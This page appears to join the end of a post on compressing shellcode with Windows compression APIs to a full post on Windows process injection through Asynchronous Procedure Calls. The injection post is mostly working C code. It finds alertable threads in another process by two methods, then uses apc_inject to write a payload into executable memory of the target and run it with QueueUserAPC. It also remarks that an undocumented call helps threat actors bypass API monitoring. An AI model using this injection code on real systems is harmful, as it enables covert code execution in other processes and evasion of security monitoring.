Since the release of Windows 10 build 17063, the tape archiving tool β€˜bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on windows supports bzip2, compress and gzip formats. Although, bsdtar shows support for xz and lzma, at least on my system along with lzip, they appear to be unsupported.

8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention, which are ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

Compression

The following code uses zlib.h to compress a buffer and write to file.

DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_deflate_t      ums_deflate;
    ums_deflate_init_t ums_deflate_init;
    int                err;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
    ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
    
    if(ums_deflate_init == NULL || ums_deflate == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    // allocate memory for compressed data
    outbuf = malloc(inlen);
    if(outbuf != NULL) {
      // Compress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen;       // size of input
      ds.next_in   = (Bytef *)inbuf;    // input buffer
      ds.avail_out = (uInt)inlen;       // size of output buffer
      ds.next_out  = (Bytef *)outbuf;   // output buffer
      
      if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
        if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
          // write the original length first
          WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
          // then the data
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_deflate() : %x\n", err);
        }
      } else {
        printf("  [ ums_deflate_init()\n");
      }
      free(outbuf);
    }
    return 0;
}

Decompression

Inflating/decompressing the data is based on an example using zlib.

DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_inflate_t      ums_inflate;
    ums_inflate_init_t ums_inflate_init;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
    ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
    
    if(ums_inflate_init == NULL || ums_inflate == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    // allocate memory for decompressed data
    outlen = *(DWORD*)inbuf;
    outbuf = malloc(outlen*2);
    
    if(outbuf != NULL) {
      // decompress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen - 8;       // size of input
      ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
      ds.avail_out = (uInt)outlen*2;        // size of output buffer
      ds.next_out  = (Bytef*)outbuf;        // output buffer
      
      printf("  [ initializing inflate...\n");
      if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
        printf("  [ inflating...\n");
        if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_inflate()\n");
        }
      } else {
        printf("  [ ums_inflate_init()\n");
      }
      free(outbuf);
    } else {
      printf("  [ malloc()\n");
    }
    return 0;
}

11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API Algorithm / Engine Compression Ratio
RtlCompressBuffer LZNT1 39%
RtlCompressBuffer Xpress 47%
RtlCompressBuffer Xpress Huffman 53%
Compress MSZIP 55%
Compress Xpress 40%
Compress Xpress Huffman 48%
Compress LZMS 58%
D3DCompressShaders DXT/BC 60%
aPLib N/A 45%
UCL N/A 42%
Undocumented API DEFLATE 46%

Windows Process Injection: Asynchronous Procedure Call (APC)

By: odzhan
27 August 2019 at 18:00

Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked β€œhow to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

Alertable Threads

A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines.. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable.

A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

Method 1

First described and used by Tal Liberman in a technique he invented called AtomBombing.

…create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

  1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
  2. CreateEvent for each thread and DuplicateHandle for the target process.
  3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
  4. WaitForMultipleObjects until one of the event handles becomes signalled.
  5. The first event signalled is from an alertable thread.

MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
    DWORD         i, cnt = 0;
    HANDLE        evt[2], ss, ht, h = NULL, 
      hl[MAXIMUM_WAIT_OBJECTS],
      sh[MAXIMUM_WAIT_OBJECTS],
      th[MAXIMUM_WAIT_OBJECTS];
    THREADENTRY32 te;
    HMODULE       m;
    LPVOID        f, rm;
    
    // 1. Enumerate threads in target process
    ss = CreateToolhelp32Snapshot(
      TH32CS_SNAPTHREAD, 0);
      
    if(ss == INVALID_HANDLE_VALUE) return NULL;

    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        // otherwise, add to list
        hl[cnt++] = ht;
        // if we've reached MAXIMUM_WAIT_OBJECTS. break
        if(cnt == MAXIMUM_WAIT_OBJECTS) break;
      } while(Thread32Next(ss, &te));
    }

    // Resolve address of SetEvent
    m  = GetModuleHandle(L"kernel32.dll");
    f  = GetProcAddress(m, "SetEvent");
    
    for(i=0; i<cnt; i++) {
      // 2. create event and duplicate in target process
      sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
      
      DuplicateHandle(
        GetCurrentProcess(),  // source process
        sh[i],                // source handle to duplicate
        hp,                   // target process
        &th[i],               // target handle
        0, 
        FALSE, 
        DUPLICATE_SAME_ACCESS);
        
      // 3. Queue APC for thread passing target event handle
      QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
    }

    // 4. Wait for event to become signalled
    i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
    if(i != WAIT_TIMEOUT) {
      // 5. save thread handle
      h = hl[i];
    }
    
    // 6. Close source + target handles
    for(i=0; i<cnt; i++) {
      CloseHandle(sh[i]);
      CloseHandle(th[i]);
      if(hl[i] != h) CloseHandle(hl[i]);
    }
    CloseHandle(ss);
    return h;
}

Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called KERNELBASE!SleepEx. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API NT System Call
SleepEx ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
WaitForSingleObjectEx
GetOverlappedResultEx
ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
WaitForMultipleObjectsEx
WSAWaitForMultipleEvents
NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, DWORD Timeout, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
SignalObjectAndWait NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
MsgWaitForMultipleObjectsEx NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
GetQueuedCompletionStatusEx NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.

Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
    CONTEXT   c;
    BOOL      alertable = FALSE;
    DWORD     i;
    ULONG_PTR p[8];
    SIZE_T    rd;
    
    // read the context
    c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
    GetThreadContext(ht, &c);
    
    // for each alertable function
    for(i=0; i<6 && !alertable; i++) {
      // compare address with program counter
      if((LPVOID)c.Rip == addr[i]) {
        switch(i) {
          // ZwDelayExecution
          case 0 : {
            alertable = (c.Rcx & TRUE);
            break;
          }
          // NtWaitForSingleObject
          case 1 : {
            alertable = (c.Rdx & TRUE);
            break;
          }
          // NtWaitForMultipleObjects
          case 2 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtSignalAndWaitForSingleObject
          case 3 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtUserMsgWaitForMultipleObjectsEx
          case 4 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[5] & MWMO_ALERTABLE);
            break;
          }
          // NtRemoveIoCompletionEx
          case 5 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[6] & TRUE);
            break;
          }            
        }
      }
    }
    return alertable;
}

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used to for Alertable parameter to NtSignalAndWaitForSingleObject.

The following code can support adding an offset or reading the thread context before enumerating threads.

// thread to run alertable functions
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    HANDLE           *evt = (HANDLE)lpParameter;
    HANDLE           port;
    OVERLAPPED_ENTRY lap;
    DWORD            n;
    
    SleepEx(INFINITE, TRUE);
    
    WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
    
    WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
    
    SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
    
    ResetEvent(evt[0]);
    ResetEvent(evt[1]);
    
    MsgWaitForMultipleObjectsEx(2, evt, 
      INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
      
    port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
    CloseHandle(port);
    
    return 0;
}

HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
    HANDLE        ss, ht, evt[2], h = NULL;
    LPVOID        rm, sevt, f[6];
    THREADENTRY32 te;
    SIZE_T        rd;
    DWORD         i;
    CONTEXT       c;
    ULONG_PTR     p;
    HMODULE       m;
    
    // using the offset requires less code but it may
    // not work across all systems.
#ifdef USE_OFFSET
    char *api[6]={
      "ZwDelayExecution", 
      "ZwWaitForSingleObject",
      "NtWaitForMultipleObjects",
      "NtSignalAndWaitForSingleObject",
      "NtUserMsgWaitForMultipleObjectsEx",
      "NtRemoveIoCompletionEx"};
      
    // 1. Resolve address of alertable functions
    for(i=0; i<6; i++) {
      m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
      f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
    }
#else
    // create thread to execute alertable functions
    evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
    evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
    ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
    
    // wait a moment for thread to initialize
    Sleep(100);
    
    // resolve address of SetEvent
    m      = GetModuleHandle(L"kernel32.dll");
    sevt   = GetProcAddress(m, "SetEvent");
    
    // for each alertable function
    for(i=0; i<6; i++) {
      // read the thread context
      c.ContextFlags = CONTEXT_CONTROL;
      GetThreadContext(ht, &c);
      // save address
      f[i] = (LPVOID)c.Rip;
      // queue SetEvent for next function
      QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
    }
    // cleanup thread
    CloseHandle(ht);
    CloseHandle(evt[0]);
    CloseHandle(evt[1]);
#endif

    // Create a snapshot of threads
    ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ss == INVALID_HANDLE_VALUE) return NULL;
    
    // check each thread
    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        
        // found alertable thread?
        if(IsAlertable(hp, ht, f)) {
          // save handle and exit loop
          h = ht;
          break;
        }
        // else close it and continue
        CloseHandle(ht);
      } while(Thread32Next(ss, &te));
    }
    // close snap shot
    CloseHandle(ss);
    return h;
}

Conclusion

Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

Injection

After the difficult part of detecting alertable threads, the rest is fairly straight forward. The two main functions used for APC injection are:

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

NTSTATUS NtQueueApcThread(
  IN  HANDLE ThreadHandle,
  IN  PVOID ApcRoutine,
  IN  PVOID ApcRoutineContext OPTIONAL,
  IN  PVOID ApcStatusBlock OPTIONAL,
  IN  ULONG ApcReserved OPTIONAL);

VOID KiUserApcDispatcher(
  IN  PCONTEXT Context,
  IN  PVOID ApcContext,
  IN  PVOID Argument1,
  IN  PVOID Argument2,
  IN  PKNORMAL_ROUTINE ApcRoutine)

For this post, only QueueUserAPC is used.

VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
    HANDLE hp, ht;
    SIZE_T wr;
    LPVOID cs;
    
    // 1. Open target process
    hp = OpenProcess(
      PROCESS_DUP_HANDLE | 
      PROCESS_VM_READ    | 
      PROCESS_VM_WRITE   | 
      PROCESS_VM_OPERATION, 
      FALSE, pid);
      
    if(hp == NULL) return;
    
    // 2. Find an alertable thread
    ht = find_alertable_thread1(hp, pid);

    if(ht != NULL) {
      // 3. Allocate memory
      cs = VirtualAllocEx(
        hp, 
        NULL, 
        payloadSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        // 4. Write code to memory
        if(WriteProcessMemory(
          hp, 
          cs, 
          payload, 
          payloadSize, 
          &wr)) 
        {
          // 5. Run code
          QueueUserAPC(cs, ht, 0);
        } else {
          printf("unable to write payload to process.\n");
        }
        // 6. Free memory
        VirtualFreeEx(
          hp, 
          cs, 
          0, 
          MEM_DECOMMIT | MEM_RELEASE);
      } else {
        printf("unable to allocate memory.\n");
      }
    } else {
      printf("unable to find alertable thread.\n");
    }
    // 7. Close process
    CloseHandle(hp);
}

PoC here

alert_output

odzhan

❌
❌